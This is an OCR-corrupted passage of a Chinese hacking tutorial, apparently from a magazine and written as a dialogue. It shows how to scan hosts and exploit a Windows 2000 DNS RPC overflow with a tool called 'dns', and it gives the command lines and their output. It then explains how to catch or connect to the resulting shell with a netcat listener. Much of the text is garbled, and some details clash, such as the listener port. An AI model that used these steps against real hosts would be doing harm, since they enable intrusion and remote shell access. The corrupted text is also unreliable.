如发现有乱码，请点击下面链接浏览原文
正文摘录:

‘攀!锚湘-_nI.，-黧露紫辣强癸捌洞端口扫描，“1028：Vull]erabllicy”表示1028端『]存在溢出漏洞，井址把对方系统的版本也检测了}1_j来，村：XF三茹i皤栩n-lI’”jI耆并I”ll∞I_篙昌“Os：window2000”，不用说就知道足w|】12000系统lr。烨_瓯焉稿矿——一％l鹇j再执行dns—t2000all192.168.0.。1001028对目缃t眯广—————一、。#：霉!簦；曼鎏曼薹盘标主机进行溢出(网12)。“Connec’tion幻targethostF”Kmr…mmn。bdq。：Htcppottestablished”成功连接到主机的TcP端口上，方蚤麻i／—／x.—~—／———一“Successfuljyb01mdt0thevLlinerableDCERPCT糠正东矗i———一一吐#}芦———一—％interface”已经连接到对方的RPC接口上，“Osfin‘睁盯赢茹而蕊蒜；=：蔓fgezprIntresult：window，s2000”系统指纹鉴定对方燕《正帝而蓄写广——一’。~bl：、籼科#眦一甯I盘‘是wirId2000系统，“Attackserlt，checkport1100"┻┻┻图9攻击代码已经成功发送，并尝试连接llO0端lJ。当出扫描结果出来了，(图1O)，一共扫描到三台主机，现最后这一句提不语句的时候就我们意味着我们要成其中第一台丰机只开了445端__】，所以这台主机不符功r。┗┻┛合条件.那么还剩下两台主机可以进行下一步的溢出操作。打开CMD命令提示符，直接输入溢出程序的名字(图11)，通常程序会返回使用格式信息，其中。use—stoscanforthetarget。spott：dnss1.2.3.4”表示使用一s这个参数可以检测1.2.3.4这个IP上的DNS溢出漏洞。。dnsoptionshost【port】，example：dns—t2000all1.2.3.41ID30”表示使用一T来选择对方的系统类型，1.2.3.4就是对方的IP地址，1030代表了图11先执行dns—s‘192.‘188.O.100对主机进行特定漏图12燕妹妹又问道：“那么怎么样连接对方的1100端口呢?”阿布说道：“当然是使用Nc了。”Nc的全称叫“Netcat”，这是一个非常简单易用的基于TCP／IP协议(C／S模型的)的。瑞士军刀”。给大家介绍一F它的几个常用的功能，其它功能等待大家去发现。1、有的溢出工具在溢出对方后是自动返回一个SHELL连接的。所以就需要在本机上监听一个端口等待对方的连接(如果对方和你不是在一个局域网，那么你得是公网环境)：Nc.eX8一vv—I—p8089，表示在本机6069端口上进行监听(图l3)。vv：显示详细的信息。一l：进行监听，监听人站信息。一p：监听所使用的端口号。图13正如今天我们遇到的情况，对方已经开放了。它在等待我们连接哦，连接上去会有什么